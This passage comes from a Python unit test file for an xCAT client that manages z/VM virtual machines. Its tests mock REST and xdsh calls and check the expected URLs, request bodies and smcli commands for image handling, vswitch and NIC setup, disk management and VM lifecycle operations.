fake_nodename,\n 'profile=' + fake_profile]\n\n self._xcatclient.do_capture(fake_nodename, fake_profile)\n xrequest.assert_called_once_with('POST', fake_url, fake_body)\n\n def test_check_space_imgimport_xcat(self):\n pass\n\n def test_export_image(self):\n pass\n\n @mock.patch.object(xcatclient, 'xcat_request')\n @mock.patch.object(os, 'remove')\n @mock.patch.object(os.path, 'exists')\n @mock.patch.object(xcatclient.XCATClient, 'check_space_imgimport_xcat')\n @mock.patch.object(xcatclient.XCATClient, 'generate_image_bundle')\n @mock.patch.object(xcatclient.XCATClient, 'generate_manifest_file')\n def test_image_import(self, generate_manifest_file,\n generate_image_bundle,\n check_space,\n file_exists,\n remove_file,\n xrequest):\n imagename = '95a4da37-9f9b-4fb2-841f-f0bb441b7544'\n url = 'file:///path/to/image/imagefile'\n imagemeta = {'os_version': 'rhel7.2'}\n time_stamp_dir = self._pathutils.make_time_stamp()\n bundle_file_path = self._pathutils.get_bundle_tmp_path(time_stamp_dir)\n remote_host_info = 'nova@192.168.99.99'\n image_profile = '95a4da37_9f9b_4fb2_841f_f0bb441b7544'\n image_meta = {\n u'id': imagename,\n u'properties': {u'image_type_xcat': u'linux',\n u'os_version': imagemeta['os_version'],\n u'os_name': u'Linux',\n u'architecture': u's390x',\n u'provision_method': u'netboot'}\n }\n generate_manifest_file.return_value = \\\n '/tmp/image/spawn_tmp/201706231109/manifest.xml'\n generate_image_bundle.return_value =\\\n '/tmp/image/spawn_tmp/201706231109.tar'\n check_space.return_value = None\n file_exists.return_value = True\n fake_url = self._xcat_url.imgimport()\n fake_body = ['osimage=/tmp/image/spawn_tmp/201706231109.tar',\n 'profile=%s' % image_profile,\n 'nozip',\n 'remotehost=%s' % remote_host_info]\n\n remove_file.return_value = None\n self._xcatclient.image_import(imagename, url, imagemeta,\n remote_host=remote_host_info)\n generate_manifest_file.assert_called_with(image_meta,\n '0100.img', bundle_file_path)\n\n xrequest.assert_called_once_with('POST', fake_url, fake_body)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_vm_nic_vswitch_info(self, xrequest):\n url = \"/xcatws/tables/switch?userName=\" +\\\n CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n self._xcatclient.get_vm_nic_vswitch_info(\"fakenode\")\n xrequest.assert_called_with('GET', url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_host_table_record(self, xrequest):\n commands = \"node=fakeid\" + \" hosts.ip=fakeip\"\n commands += \" hosts.hostnames=fakehost\"\n body = [commands]\n url = \"/xcatws/tables/hosts?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n\n self._xcatclient._add_host_table_record(\"fakeid\", \"fakeip\", \"fakehost\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_host_table_record_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._add_host_table_record,\n \"fakeid\", \"fakeip\", \"fakehost\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_makehost(self, xrequest):\n url = \"/xcatws/networks/makehosts?userName=\" +\\\n CONF.xcat.username + \"&password=\" +\\\n CONF.xcat.password + \"&format=json\"\n\n self._xcatclient._makehost()\n xrequest.assert_called_once_with(\"PUT\", url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_makehost_fail(self, xrequest):\n xrequest.side_effect = exception.ZVMNetworkError(msg='msg')\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient._makehost)\n\n @mock.patch.object(xcatclient.XCATClient, '_makehost')\n @mock.patch.object(xcatclient.XCATClient, '_add_host_table_record')\n def test_preset_vm_network(self, add_host, makehost):\n self._xcatclient._preset_vm_network(\"fakeid\", \"fakeip\")\n add_host.assert_called_with(\"fakeid\", \"fakeip\", \"fakeid\")\n makehost.assert_called_with()\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_nic_ids(self, xrequest):\n xrequest.return_value = {\"data\": [[\"test1\", \"test2\"]]}\n url = \"/xcatws/tables/switch?userName=\" +\\\n CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n info = self._xcatclient._get_nic_ids()\n xrequest.assert_called_with('GET', url)\n self.assertEqual(info[0], \"test2\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_userid_from_node(self, xrequest):\n xrequest.return_value = {\"data\": [\"fake\"]}\n url = \"/xcatws/tables/zvm?userName=\" +\\\n CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\" +\\\n \"&col=node&value=fakenode&attribute=userid\"\n info = self._xcatclient._get_userid_from_node(\"fakenode\")\n xrequest.assert_called_with('GET', url)\n self.assertEqual(info, xrequest.return_value['data'][0][0])\n\n @mock.patch.object(xcatclient.XCATClient, '_get_userid_from_node')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_nic_settings(self, xrequest, get_userid_from_node):\n xrequest.return_value = {\"data\": [[\"fake\"]]}\n url = \"/xcatws/tables/switch?userName=\" +\\\n CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\" +\\\n \"&col=port&value=fakeport&attribute=node\"\n self._xcatclient._get_nic_settings(\"fakeport\")\n xrequest.assert_called_once_with('GET', url)\n get_userid_from_node.assert_called_once_with(\"fake\")\n\n @mock.patch.object(xcatclient.XCATClient, '_get_nic_settings')\n def test_get_node_from_port(self, get_nic_settings):\n self._xcatclient._get_node_from_port(\"fakeport\")\n get_nic_settings.assert_called_with(\"fakeport\", get_node=True)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_grant_user_to_vswitch(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'zhcpuserid'}\n xrequest.return_value = {\"errorcode\": [['0']]}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli Virtual_Network_Vswitch_Set_Extended'\n commands += \" -T zhcpuserid\"\n commands += \" -k switch_name=fakevs\"\n commands += \" -k grant_userid=fakeuserid\"\n commands += \" -k persist=YES\"\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n\n self._xcatclient.grant_user_to_vswitch(\"fakevs\", \"fakeuserid\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_revoke_user_from_vswitch(self, xrequest, get_hcp):\n xrequest.return_value = {\"errorcode\": [['0']]}\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'zhcpuserid'}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli Virtual_Network_Vswitch_Set_Extended'\n commands += \" -T zhcpuserid\"\n commands += \" -k switch_name=fakevs\"\n commands += \" -k revoke_userid=fakeuserid\"\n commands += \" -k persist=YES\"\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n\n self._xcatclient.revoke_user_from_vswitch(\"fakevs\", \"fakeuserid\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_update_xcat_switch')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_couple_nic(self, xrequest, update_switch, get_hcp):\n xrequest.return_value = {\"errorcode\": [['0']]}\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'zhcpuserid'}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli'\n commands += ' Virtual_Network_Adapter_Connect_Vswitch_DM'\n commands += \" -T fakeuserid \" + \"-v fakevdev\"\n commands += \" -n fakevs\"\n xdsh_commands = 'command=%s' % commands\n body1 = [xdsh_commands]\n\n commands = '/opt/zhcp/bin/smcli'\n commands += ' Virtual_Network_Adapter_Connect_Vswitch'\n commands += \" -T fakeuserid \" + \"-v fakevdev\"\n commands += \" -n fakevs\"\n xdsh_commands = 'command=%s' % commands\n body2 = [xdsh_commands]\n\n self._xcatclient._couple_nic(\"fakeuserid\", \"fakevdev\", \"fakevs\",\n active=True)\n update_switch.assert_called_with(\"fakeuserid\", \"fakevdev\",\n \"fakevs\")\n xrequest.assert_any_call(\"PUT\", url, body1)\n xrequest.assert_any_call(\"PUT\", url, body2)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_update_xcat_switch')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_uncouple_nic(self, xrequest, update_switch, get_hcp):\n xrequest.return_value = {\"errorcode\": [['0']]}\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'zhcpuserid'}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli'\n commands += ' Virtual_Network_Adapter_Disconnect_DM'\n commands += \" -T fakeuserid \" + \"-v fakevdev\"\n xdsh_commands = 'command=%s' % commands\n body1 = [xdsh_commands]\n\n commands = '/opt/zhcp/bin/smcli'\n commands += ' Virtual_Network_Adapter_Disconnect'\n commands += \" -T fakeuserid \" + \"-v fakevdev\"\n xdsh_commands = 'command=%s' % commands\n body2 = [xdsh_commands]\n\n self._xcatclient._uncouple_nic(\"fakeuserid\",\n \"fakevdev\", active=True)\n update_switch.assert_called_with(\"fakeuserid\", \"fakevdev\", None)\n xrequest.assert_any_call(\"PUT\", url, body1)\n xrequest.assert_any_call(\"PUT\", url, body2)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_vswitch_list(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'fakenode'}\n xrequest.return_value = {\n \"data\": [[u\"VSWITCH: Name: TEST\", u\"VSWITCH: Name: TEST2\"]],\n \"errorcode\": [['0']]\n }\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = ' '.join((\n '/opt/zhcp/bin/smcli Virtual_Network_Vswitch_Query',\n \"-T fakenode\",\n \"-s \\'*\\'\"))\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n info = self._xcatclient.get_vswitch_list()\n get_hcp.assert_called_with()\n xrequest.assert_called_with(\"PUT\", url, body)\n self.assertEqual(info[0], \"TEST\")\n self.assertEqual(info[1], \"TEST2\")\n\n @mock.patch.object(xcatclient.XCATClient, '_couple_nic')\n def test_couple_nic_to_vswitch(self, couple_nic):\n self._xcatclient.couple_nic_to_vswitch(\"fake_userid\",\n \"fakevdev\",\n \"fake_VS_name\",\n True)\n couple_nic.assert_called_with(\"fake_userid\",\n \"fakevdev\",\n \"fake_VS_name\",\n active=True)\n\n @mock.patch.object(xcatclient.XCATClient, '_uncouple_nic')\n def test_uncouple_nic_from_vswitch(self, uncouple_nic):\n self._xcatclient.uncouple_nic_from_vswitch(\"fake_userid\",\n \"fakevdev\",\n False)\n uncouple_nic.assert_called_with(\"fake_userid\",\n \"fakevdev\", active=False)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_vswitch(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'fakeuserid'}\n xrequest.return_value = {\n \"data\": [[\"0\"]],\n \"errorcode\": [['0']]\n }\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli ' +\\\n 'Virtual_Network_Vswitch_Create_Extended'\n commands += \" -T fakeuserid\"\n commands += ' -k switch_name=fakename'\n commands += \" -k real_device_address='111 222'\"\n commands = ' '.join((commands,\n \"-k connection_value=CONNECT\",\n \"-k queue_memory_limit=5\",\n \"-k transport_type=ETHERNET\",\n \"-k vlan_id=10\",\n \"-k persist=NO\",\n \"-k port_type=ACCESS\",\n \"-k gvrp_value=GVRP\",\n \"-k native_vlanid=None\",\n \"-k routing_value=NONROUTER\"))\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n self._xcatclient.add_vswitch(\"fakename\", rdev=\"111 222\",\n controller='*', connection='CONNECT',\n network_type='ETHERNET',\n router=\"NONROUTER\", vid='10',\n port_type='ACCESS', gvrp='GVRP',\n queue_mem=5, native_vid=None,\n persist=False)\n xrequest.assert_called_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_image_query_with_keyword(self, xrequest):\n xrequest.return_value = {'info':\n [[u'sles12-s390x-netboot-0a0c576a_157f_42c8_bde5 (osimage)']],\n 'node': [],\n 'errorcode': [],\n 'data': [],\n 'error': []}\n\n imagekeyword = '0a0c576a-157f-42c8-bde5'\n url = \"/xcatws/images?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json&criteria=profile=~\" + imagekeyword.replace('-',\n '_')\n image_list = [u'sles12-s390x-netboot-0a0c576a_157f_42c8_bde5']\n ret = self._xcatclient.image_query(imagekeyword)\n xrequest.assert_called_once_with(\"GET\", url)\n self.assertEqual(ret, image_list)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_image_query_without_keyword(self, xrequest):\n xrequest.return_value = {'info':\n [[u'rhel7.2-s390x-netboot-eae09a9f_7958_4024_a58c (osimage)',\n u'sles12-s390x-netboot-0a0c576a_157f_42c8_bde5 (osimage)']],\n 'node': [],\n 'errorcode': [],\n 'data': [],\n 'error': []}\n image_list = [u'rhel7.2-s390x-netboot-eae09a9f_7958_4024_a58c',\n u'sles12-s390x-netboot-0a0c576a_157f_42c8_bde5']\n url = \"/xcatws/images?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n ret = self._xcatclient.image_query()\n xrequest.assert_called_once_with(\"GET\", url)\n self.assertEqual(ret, image_list)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_user_console_output(self, xreq):\n log_str = 'fakeid: this is console log for fakeid\\n'\n xreq.return_value = {'info': [[log_str]]}\n clog = self._xcatclient.get_user_console_output('fakeid', 100)\n self.assertEqual(clog, 'this is console log for fakeid\\n')\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_user_console_output_invalid_output(self, xreq):\n xreq.return_value = {}\n self.assertRaises(exception.ZVMInvalidResponseDataError,\n self._xcatclient.get_user_console_output,\n 'fakeid', 100)\n\n @mock.patch.object(xcatclient.XCATClient, 'aemod_handler')\n def test_process_additional_minidisks(self, aemod_handler):\n userid = 'inst001'\n disk_list = [{'vdev': '0101',\n 'format': 'ext3',\n 'mntdir': '/mnt/0101'}]\n vdev = '0101'\n fmt = 'ext3'\n mntdir = '/mnt/0101'\n func_name = 'setupDisk'\n parms = ' '.join([\n 'action=addMdisk',\n 'vaddr=' + vdev,\n 'filesys=' + fmt,\n 'mntdir=' + mntdir\n ])\n parmline = ''.join(parms)\n self._xcatclient.process_additional_minidisks(userid, disk_list)\n aemod_handler.assert_called_with(userid, func_name, parmline)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, 'xdsh')\n def test_unlock_userid(self, xdsh, get_hcp):\n userid = 'fakeuser'\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'cmabvt'}\n cmd = \"/opt/zhcp/bin/smcli Image_Unlock_DM -T %s\" % userid\n self._xcatclient.unlock_userid(userid)\n xdsh.assert_called_once_with('zhcp2', cmd)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, 'xdsh')\n def test_unlock_device(self, xdsh, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'cmabvt'}\n userid = 'fakeuser'\n resp = {'data': [['Locked type: DEVICE\\nDevice address: 0100\\n'\n 'Device locked by: fake\\nDevice address: 0101\\n'\n 'Device locked by: fake']]}\n xdsh.side_effect = [resp, None, None]\n self._xcatclient.unlock_devices(userid)\n\n xdsh.assert_any_call('zhcp2',\n '/opt/zhcp/bin/smcli Image_Lock_Query_DM -T fakeuser')\n xdsh.assert_any_call('zhcp2',\n '/opt/zhcp/bin/smcli Image_Unlock_DM -T fakeuser -v 0100')\n xdsh.assert_any_call('zhcp2',\n '/opt/zhcp/bin/smcli Image_Unlock_DM -T fakeuser -v 0101')\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_xcat_node(self, xrequest):\n fake_userid = 'fakeuser'\n fake_url = self._xcat_url.rmdef('/' + fake_userid)\n\n self._xcatclient.delete_xcat_node(fake_userid)\n xrequest.assert_called_once_with('DELETE', fake_url)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n @mock.patch.object(xcatclient.XCATClient, 'delete_xcat_node')\n def test_delete_userid_not_exist(self, delete_xcat_node, xrequest):\n fake_userid = 'fakeuser'\n fake_url = self._xcat_url.rmvm('/' + fake_userid)\n xrequest.side_effect = exception.ZVMClientInternalError(\n 'Return Code: 400\\nReason Code: 4\\n')\n\n self._xcatclient.delete_userid(fake_userid)\n xrequest.assert_called_once_with('DELETE', fake_url)\n delete_xcat_node.assert_called_once_with(fake_userid)\n\n @mock.patch.object(xcatclient.XCATClient, '_clean_network_resource')\n @mock.patch.object(xcatclient.XCATClient, 'delete_userid')\n def test_delete_vm(self, delete_userid, clean_net):\n fake_userid = 'fakeuser'\n self._xcatclient.delete_vm(fake_userid)\n delete_userid.assert_called_once_with(fake_userid)\n clean_net.assert_called_once_with(fake_userid)\n\n @mock.patch.object(xcatclient.XCATClient, '_clean_network_resource')\n @mock.patch.object(xcatclient.XCATClient, 'unlock_devices')\n @mock.patch.object(xcatclient.XCATClient, 'delete_userid')\n def test_delete_vm_with_locked_device(self, delete_userid, unlock_devices,\n clean_net):\n fake_userid = 'fakeuser'\n delete_userid.side_effect = [exception.ZVMClientInternalError(\n 'Return Code: 408\\n Reason Code: 12\\n'), None]\n\n self._xcatclient.delete_vm(fake_userid)\n delete_userid.assert_called_with(fake_userid)\n unlock_devices.assert_called_with(fake_userid)\n\n @mock.patch.object(xcatclient.XCATClient, '_clean_network_resource')\n @mock.patch.object(xcatclient.XCATClient, 'delete_userid')\n def test_delete_vm_node_not_exist(self, delete_userid, clean_net):\n fake_userid = 'fakeuser'\n delete_userid.side_effect = exception.ZVMClientRequestFailed(msg='msg')\n\n self.assertRaises(exception.ZVMClientRequestFailed,\n self._xcatclient.delete_vm, fake_userid)\n\n @mock.patch.object(xml.dom.minidom, 'Document')\n @mock.patch.object(xml.dom.minidom.Document, 'createElement')\n def test_generate_manifest_file(self, create_element, document):\n \"\"\"\n image_meta = {\n u'id': 'image_uuid_123',\n u'properties': {u'image_type_xcat': u'linux',\n u'os_version': u'rhel7.2',\n u'os_name': u'Linux',\n u'architecture': u's390x',\n u'provision_metuot'}\n }\n image_name = 'image_name_123'\n tmp_date_dir = 'tmp_date_dir'\n disk_file_name = 'asdf'\n manifest_path = os.getcwd()\n manifest_path = manifest_path + '/' + tmp_date_dir\n \"\"\"\n pass\n\n @mock.patch.object(os.path, 'exists')\n @mock.patch.object(tarfile, 'open')\n @mock.patch.object(tarfile.TarFile, 'add')\n @mock.patch.object(tarfile.TarFile, 'close')\n @mock.patch.object(shutil, 'copyfile')\n @mock.patch.object(os, 'chdir')\n def test_generate_image_bundle(self, change_dir,\n copy_file, close_file,\n add_file, tarfile_open,\n file_exist):\n time_stamp_dir = 'tmp_date_dir'\n image_name = 'test'\n spawn_path = '.'\n spawn_path = spawn_path + '/' + time_stamp_dir\n image_file_path = spawn_path + '/images/test.img'\n change_dir.return_value = None\n copy_file.return_value = None\n close_file.return_value = None\n add_file.return_value = None\n tarfile_open.return_value = tarfile.TarFile\n file_exist.return_value = True\n\n self._xcatclient.generate_image_bundle(\n spawn_path, time_stamp_dir,\n image_name, image_file_path)\n tarfile_open.assert_called_once_with(spawn_path +\n '/tmp_date_dir_test.tar',\n mode='w')\n\n @mock.patch.object(xcatclient.XCATClient, 'add_mdisks')\n @mock.patch.object(xcatclient, 'xcat_request')\n @mock.patch.object(xcatclient.XCATClient, 'prepare_for_spawn')\n def test_create_vm(self, prepare_for_spawn, xrequest, add_mdisks):\n user_id = 'fakeuser'\n cpu = 2\n memory = 1024\n disk_list = [{'size': '1g',\n 'is_boot_disk': True,\n 'disk_pool': 'ECKD:eckdpool1'}]\n profile = 'dfltprof'\n url = \"/xcatws/vms/fakeuser?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n body = ['profile=dfltprof',\n 'password=%s' % CONF.zvm.user_default_password, 'cpu=2',\n 'memory=1024m', 'privilege=G', 'ipl=0100']\n self._xcatclient.create_vm(user_id, cpu, memory, disk_list, profile)\n prepare_for_spawn.assert_called_once_with(user_id)\n xrequest.assert_called_once_with('POST', url, body)\n add_mdisks.assert_called_once_with(user_id, disk_list)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_add_mdisk(self, xrequest):\n userid = 'fakeuser'\n disk = {'size': '1g',\n 'disk_pool': 'ECKD:eckdpool1',\n 'format': 'ext3'}\n vdev = '0101'\n url = \"/xcatws/vms/fakeuser?\" + \\\n \"userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password + \"&format=json\"\n body = [\" \".join(['--add3390', 'eckdpool1', vdev, '1g', \"MR\", \"''\",\n \"''\", \"''\", 'ext3'])]\n\n self._xcatclient._add_mdisk(userid, disk, vdev),\n xrequest.assert_called_once_with('PUT', url, body)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_set_vswitch_port_vlan_id(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'zhcpuserid'}\n xrequest.return_value = {\"errorcode\": [['0']]}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = '/opt/zhcp/bin/smcli Virtual_Network_Vswitch_Set_Extended'\n commands += \" -T zhcpuserid\"\n commands += ' -k grant_userid=userid'\n commands += \" -k switch_name=vswitch_name\"\n commands += \" -k user_vlan_id=vlan_id\"\n commands += \" -k persist=YES\"\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n\n self._xcatclient.set_vswitch_port_vlan_id(\"vswitch_name\",\n \"userid\",\n \"vlan_id\")\n xrequest.assert_called_once_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, 'remove_image_file')\n @mock.patch.object(xcatclient.XCATClient, 'remove_image_definition')\n def test_image_delete(self, remove_image_def, remove_image_file):\n image_name = 'image-unique-name'\n self._xcatclient.image_delete(image_name)\n remove_image_file.assert_called_once_with(image_name)\n remove_image_def.assert_called_once_with(image_name)\n\n def test_get_image_path_by_name(self):\n fake_name = 'rhel7.2-s390x-netboot-fake_image_uuid'\n expected_path = '/install/netboot/rhel7.2/s390x/fake_image_uuid/' +\\\n CONF.zvm.user_root_vdev + '.img'\n ret = self._xcatclient.get_image_path_by_name(fake_name)\n self.assertEqual(ret, expected_path)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_set_vswitch(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'fakenode'}\n xrequest.return_value = {\"errorcode\": [['0']]}\n url = \"/xcatws/nodes/zhcp2\" +\\\n \"/dsh?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n commands = ' '.join((\n '/opt/zhcp/bin/smcli Virtual_Network_Vswitch_Set_Extended',\n \"-T fakenode\",\n \"-k switch_name=fake_vs\",\n \"-k real_device_address='1000 1003'\"))\n\n xdsh_commands = 'command=%s' % commands\n body = [xdsh_commands]\n self._xcatclient.set_vswitch(\"fake_vs\",\n real_device_address='1000 1003')\n xrequest.assert_called_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_set_vswitch_with_errorcode(self, xrequest, get_hcp):\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'fakenode'}\n xrequest.return_value = {\"data\": \"Returned data\",\n \"errorcode\": [['1']]}\n\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient.set_vswitch,\n \"vswitch_name\", grant_userid='fake_id')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_nic_ids')\n @mock.patch.object(xcatclient.XCATClient, '_preset_vm_network')\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_create_nic')\n def test_create_nic(self, create_nic, get_hcp, preset_vm, get_nic):\n get_nic.return_value = ['\"fake_id\",,,,\"1003\",,',\n '\"fake_id\",,,,\"1006\",,']\n get_hcp.return_value = {'nodename': 'zhcp2'}\n self._xcatclient.create_nic('fake_id', vdev='1009', nic_id='nic_id',\n ip_addr='fake_ip')\n preset_vm.assert_called_with('fake_id', 'fake_ip')\n create_nic.assert_called_with('fake_id',\n '1009', 'zhcp2', nic_id=\"nic_id\",\n mac_addr=None, active=False)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_nic_ids')\n @mock.patch.object(xcatclient.XCATClient, '_preset_vm_network')\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient.XCATClient, '_create_nic')\n def test_create_nic_without_vdev(self, create_nic, get_hcp, preset_vm,\n get_nic):\n get_nic.return_value = ['\"fake_id\",,,,\"1003\",,',\n '\"fake_id\",,,,\"2003\",,']\n get_hcp.return_value = {'nodename': 'zhcp2'}\n self._xcatclient.create_nic('fake_id', nic_id='nic_id',\n ip_addr='fake_ip')\n preset_vm.assert_called_with('fake_id', 'fake_ip')\n create_nic.assert_called_with('fake_id', '2006', 'zhcp2',\n nic_id='nic_id',\n mac_addr=None, active=False)\n\n @mock.patch.object(xcatclient.XCATClient, '_get_nic_ids')\n def test_create_nic_with_used_vdev(self, get_nic):\n get_nic.return_value = ['\"fake_id\",,,,\"1003\",,',\n '\"fake_id\",,,,\"1006\",,']\n self.assertRaises(exception.ZVMInvalidInput,\n self._xcatclient.create_nic,\n 'fake_id', nic_id=\"nic_id\", vdev='1004')\n\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_delete_vswitch_with_errorcode(self, xrequest, get_hcp):\n xrequest.return_value = {\"data\": [[\"Returned data\"]],\n \"errorcode\": [['1']]}\n get_hcp.return_value = {'nodename': 'zhcp2', 'userid': 'cmabvt'}\n\n self.assertRaises(exception.ZVMNetworkError,\n self._xcatclient.delete_vswitch,\n \"vswitch_name\", 2)\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_private_update_xcat_switch(self, xrequest):\n commands = \"node=fake_id\"\n commands += \",interface=fake_vdev\"\n commands += \" switch.switch=fake_vs\"\n url = self._xcat_url.tabch(\"/switch\")\n body = [commands]\n self._xcatclient._update_xcat_switch(\"fake_id\", \"fake_vdev\", \"fake_vs\")\n xrequest.assert_called_with(\"PUT\", url, body)\n\n @mock.patch.object(xcatclient.XCATClient, 'xdsh')\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n def test_query_vswitch(self, get_hcp_info, xdsh):\n get_hcp_info.return_value = {'hostname': \"fakehcp.fake.com\",\n 'nodename': \"fakehcp\",\n 'userid': \"fakeuserid\"}\n xdsh.return_value = {'info': [], 'node': [], 'errorcode': [[u'0']],\n 'data': [[\n 'zhcp2: switch_name: UNITTEST\\n'\n 'zhcp2: transport_type: IP\\n'\n 'zhcp2: port_type: ACCESS\\n'\n 'zhcp2: queue_memory_limit: 8\\n'\n 'zhcp2: routing_value: NONROUTER\\n'\n 'zhcp2: vlan_awareness: AWARE\\n'\n 'zhcp2: vlan_id: 0011\\n'\n 'zhcp2: native_vlan_id: 0001\\n'\n 'zhcp2: mac_address: 02-00-02-00-02-23\\n'\n 'zhcp2: gvrp_request_attribute: NOGVRP\\n'\n 'zhcp2: gvrp_enabled_attribute: NOGVRP\\n'\n 'zhcp2: switch_status: 1\\n'\n 'zhcp2: link_ag: LAG:\\n'\n 'zhcp2: lag_interval: 0\\n'\n 'zhcp2: lag_group: (NOGRP)\\n'\n 'zhcp2: IP_timeout: 5\\n'\n 'zhcp2: switch_type: QDIO\\n'\n 'zhcp2: isolation_status: NOISOLATION\\n'\n 'zhcp2: MAC_protect: NOMACPROTECT\\n'\n 'zhcp2: user_port_based: USERBASED\\n'\n 'zhcp2: VLAN_counters: E)\\n'\n 'zhcp2: vepa_status: (NONE)\\n'\n 'zhcp2: real_device_address: 1111\\n'\n 'zhcp2: virtual_device_address: 